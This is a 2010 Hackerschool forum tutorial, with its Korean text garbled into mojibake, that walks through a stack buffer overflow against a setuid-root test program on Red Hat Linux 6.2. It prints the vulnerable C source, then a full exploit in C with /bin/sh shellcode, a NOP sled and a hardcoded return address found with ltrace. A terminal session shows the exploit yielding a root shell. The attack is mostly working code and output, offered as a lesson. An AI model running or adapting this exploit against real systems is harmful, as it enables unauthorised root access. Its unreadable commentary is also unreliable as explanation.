1581, 8/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   buff3r
   http://#include .
   [ÀÚÀÛ]RedHat 6.2 ȯ°æ¿¡¼­ BOF exploit ¸¸µé±â

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1437 [º¹»ç]


À̹ø°­Á´ º°·Î ¶æÀº ¾ø½À´Ï´Ù.
´©±¸µçÁö 1ºÐ¸¸ »ý°¢Çϸé ©¼öÀÖ´Â ÀͽºÇ÷ÎÀÕÀÔ´Ï´Ù .
Á¦°¡ ÀÚÀ¯°­Á½ǿ¡ ¿Ã¸®´Â ÀÌÀ¯´Â .. !
'º°ºûÀ»´ã¾Æ'´ÔÀÇ °­Á¸¦ °ßÁ¦Çϱâ À§Çؼ­ .. !!!! ÀÔ´Ï´Ù .¤»¤»¤»¤»

Àü¿¡ Á¦ Ƽ½ºÅ丮¿¡ ¿Ã·È¾úÁö¸¸ À߸øµÈÁ¡ÀÌ ÀÖ¾î ¼öÁ¤ÇÑ°ÍÀ» ´Ù½Ã ¿Ã¸³´Ï´Ù .!

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0smp on an i686
login: buff3r
Password:
Last login: Sat Mar  6 19:26:44 from 192.168.0.3
[buff3r@testserver buff3r]$ ls -al
total 36
drwx------    3 buff3r   buff3r       4096 Mar  6 19:13 .
drwxr-xr-x    7 root     root         4096 Mar  6 18:54 ..
-rw-------    1 buff3r   buff3r       1239 Mar  6 19:30 .bash_history
-rw-r--r--    1 buff3r   buff3r         24 Mar  6 18:54 .bash_logout
-rw-r--r--    1 buff3r   buff3r        230 Mar  6 18:54 .bash_profile
-rw-r--r--    1 buff3r   buff3r        124 Mar  6 18:54 .bashrc
-rwxr-xr-x    1 buff3r   buff3r        333 Mar  6 18:54 .emacs
-rw-r--r--    1 buff3r   buff3r       3394 Mar  6 18:54 .screenrc
drwxrwxr-x    2 buff3r   buff3r       4096 Mar  6 19:30 exploits
[buff3r@testserver buff3r]$ cd exploits/
[buff3r@testserver exploits]$ ls -al
total 28
drwxrwxr-x    2 buff3r   buff3r       4096 Mar  6 19:30 .
drwx------    3 buff3r   buff3r       4096 Mar  6 19:13 ..
-rw-rw-r--    1 buff3r   buff3r        852 Mar  6 19:27 exploit.c
-rwsr-xr-x    1 root     root        11750 Mar  6 19:14 vuln
-rw-r--r--    1 root     root          109 Mar  6 19:14 vuln.c
[buff3r@testserver exploits]$ cat vuln.c
#include <stdio.h>
int main(int argc,char *argv[])
{
char buffer[500];
strcpy(buffer,argv[1]);
return ;
}
[buff3r@testserver exploits]$ cat exploit.c
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"; // This Is Shellcode
int main(int argc, char *argv[])
{
        int i, offset;
        long esp, ret, *addr_ptr;
        char *buffer, *ptr;
        ret = 0; // ¿ì¸®´Â ¾ÆÁ÷ ret ÀÇ °ªÀ» ¸ð¸¨´Ï´Ù.
        buffer = malloc(600);
        ptr = buffer;
        addr_ptr = (long *) ptr;
        for(i=0; i < 600; i+=4)
        { *(addr_ptr++) = ret; }
        for(i=0; i < 200; i++)
        { buffer[i] = '\x90'; }
        ptr = buffer + 200;
        for(i=0; i < strlen(shellcode); i++)
        { *(ptr++) = shellcode[i]; }    
        buffer[600-1] = 0;        
        execl("./vuln", "vuln", buffer, 0);
        free(buffer);
        return 0;
}
[buff3r@testserver exploits]$ cp vuln buff
[buff3r@testserver exploits]$ ltrace ./buff `perl -e 'print "\x41"x600'`
__libc_start_main(0x080483d0, 2, 0xbffff944, 0x08048298, 0x0804842c <unfinished ...>
__register_frame_info(0x0804945c, 0x08049530, 0xbffff904, 0x080482bd, 0x401081ec) = 0x40108d40
strcpy(0xbffff704, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...) = 0xbffff704
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
[buff3r@testserver exploits]$ vi exploit.c
[buff3r@testserver exploits]$ gcc exploit.c -o exploit
[buff3r@testserver exploits]$ /bin/bash2
[buff3r@testserver exploits]$ ./exploit
bash# id
uid=0(root) gid=501(buff3r) groups=501(buff3r)

·çÆ® ±ÇÇÑÀ» ¾ò¾î³¾¼öÀÖ´Ù .
Áß¿äºÎºÐ¸¸ º¸µµ·Ï ÇÏÀÚ
vuln.c
#include <stdio.h>
int main(int argc,char *argv[])
{
char buffer[500]; // 500Å©±âÀÇ ¹öÆÛ¸¦ ¼±¾ðÇÑ´Ù

// Stack Status : [BUFFER (500byte)][SFP (4btye)[RET (4byte)]
strcpy(buffer,argv[1]);
return ;
}

exploit.c
¿ø·¡ get_esp °°Àº ÀζóÀÎ ¾î¼Àºí¸® ÇÔ¼ö¸¦ ¼±¾ðÇÑÈÄ ¿ÀÇÁ¼ÂÀ» Âï¾îº¸´Â°ÍÀÌ ÀϹÝÀûÀÎ °ø°Ü¹ýÀÌÁö¸¸ redhat 6.2 ¿¡¼­´Â random stackÀÌ Àû¿ëÀÌ ¾ÈµÇ¹Ç·Î ±×³É Á¤È®ÇÑ ÁÖ¼Ò°ªÀ» ¾ò¾î³¾¼öÀÖÀ¸¹Ç·Î offsetÀÌ ÇÊ¿ä¾ø´Ù.
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"; // This Is Shellcode
int main(int argc, char *argv[])
{
        int i, offset;
        long esp, ret, *addr_ptr;
        char *buffer, *ptr;
        ret = 0xbffff704; // ¾Æ±î ltrace ¸¦ ÅëÇØ strcpy °¡ ¾î¶² À§Ä¡¿¡ argv[1]À» º¹»çÇÏ´ÂÁö
                             // ¾Ë¾Æ³Â´Ù ±× °ªÀ» ÀÌ¿ëÇÏÀÚ
        buffer = malloc(600); // °ø°Ý½ºÅÃÀ» ±¸¼ºÇϱâ À§ÇÑ ÇÒ´ç
        ptr = buffer;
        addr_ptr = (long *) ptr;
        for(i=0; i < 600; i+=4)
        { *(addr_ptr++) = ret; } // óÀ½ 600 ¹ÙÀÌÆ®¸¦ ¸ðµÎ ret·Î ä¿î´Ù (0xbffff704)
        for(i=0; i < 200; i++)
        { buffer[i] = '\x90'; } // óÀ½ 200 ¹ÙÀÌÆ®¸¦ ¸ðµÎ NOPÀ¸·Î ä¿î´Ù.
        ptr = buffer + 200;
        for(i=0; i < strlen(shellcode); i++)
        { *(ptr++) = shellcode[i]; }    // óÀ½ + 200 ºÎÅÍ ½©Äڵ带 ³öµÐ´Ù.(NOPµÚ¿¡³öµÐ´Ù.)
        buffer[600-1] = 0;        // ¸Ç³¡À» 0À¸·Î ³¡³½´Ù
        execl("./vuln", "vuln", buffer, 0); // ¿ì¸®°¡ ¸¸µç °ø°Ý ¹öÆÛ¸¦ vuln ÀÇ ÀÎÀÚ·Î

                              // ÁÖ°í vuln À» ½ÇÇàÇÑ´Ù.  
        free(buffer);
        return 0;
}

  Hit : 13254     Date : 2010/03/17 07:51



    
º°ºûÀ»´ã¾Æ ...Çß´ø¸» Ãë¼Ò 2010/03/17  
º°ºûÀ»´ã¾Æ ³» ¾ÕÀ» °¡·Î¸·´Ù´Ï... 2010/03/17  
¼Ò¿ï ³ªº¸´ÙÇÑ»ì¾î¸®´Ù´Ï.. 2010/03/17  
Myers BOF¸Å´Ï¾Æ Buff3r... NOP½ä¸ÅÀΰϹÌ? 2010/03/17  
Aentanis ¸ÓÁö;; 2010/05/23  
Cpgroot .. 2010/08/18  
1441   ³×Æ®¿öÅ© °³³ä ÈÖ¾îÀâ±â 4[14]     ¼ÒÀ¯
09/13 13218
1440   ³×Æ®¿öÅ© °³³ä ÈÖ¾îÀâ±â 3[17]     ¼ÒÀ¯
09/12 13215
1439   * À©µµ¿ì ÇØÅ·ÀÇ ±âº» ¿ø¸®*[29]     oes2
08/26 13189
1438   ¿øÀç¾Æºü´ÔÀÇ gcc 2.96¿¡¼­ÀÇ ¹öÆÛ ±¸Á¶ °­ÁÂ.[9]     ttongfly
09/19 13120
1437   [802.11] How to Crack WPA[6]     DCos
02/17 13091
1436   [802.11] How to Attack WiFi Phishing??[2]     DCos
02/27 13086
1435   [Project] Àü±â,ÀüÀÚ »ó½Ä ¹× »þÇÁ½ÉÀ¸·Î Àü±¸¸¸µé±â. - 3[16]     ¾ÆÀÌÇÁ¸®µå
02/03 13085
1434   °³ÀÎÁ¤º¸ ÀÌ¿ë³»¿ª ÅëÁöÁ¦µµ¶õ     HongMK900
08/13 13067
1433   [Á¤¸®] ÇØÄð °­ÁÂ½Ç ³»¿ë 14~48pÁö Á¤¸®[7]     W.H.
03/13 12969
1432   À©µµ¿ì ¸í·É¾î[12]     whqkdnf000
10/26 12907
1431   ¹è¿­ ³»¿¡¼­ ·£´ýÇÑ n°³ ÃßÃâÇϱâ[2]     kjwon15
12/05 12896
1430   [Æß]Ptrace¸¦ ÀÌ¿ëÇÑ Àç¹Ì´Â ÇØÅ·.[4]     ^^
02/08 12887
1429   "ÇØÄ¿°¡ µÇ·Á¸é ¹«¾ùÀ» ¾Ë¾Æ¾ß Çϳª¿ä?" ÀÇ ´äº¯(¹ßÃé)[48]     mati
08/01 12880
1428   Sendmail ¼Ò½º·Î ¼³Ä¡Çϱâ[1]     h41d35
09/12 12867
1427   ³×Æ®¿öÅ© °³³ä ÈÖ¾îÀâ±â 5[10]     ¼ÒÀ¯
09/14 12865
1426   3¹ø°c°­ÁÂÀÔ´Ï´Ù~¤»[8]     ±«µµjs
07/14 12856
1425   ±¸±Û ÇØÅ·?[7]     nsh009
11/06 12852
1424   [Æß]½º´ÏÇÎ[1]     loveaaav
03/24 12844
1423   [C±âÃÊ] 11 - ÇÔ¼ö ¸Å°³º¯¼ö·Î ¹è¿­À» ³Ñ±â·Á¸é?      sihun1113
05/01 12818
1422   [ÀÚÀÛ] W's ¾ÏÈ£ÇÐ(Cryptology) - ½ºÆĸ£Åº ¾ÏÈ£,½ÃÀú(¾ËÆĺªÄ¡È¯)¾ÏÈ£[11]     williamlee
07/28 12791
[1][2][3][4][5][6][7] 8 [9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org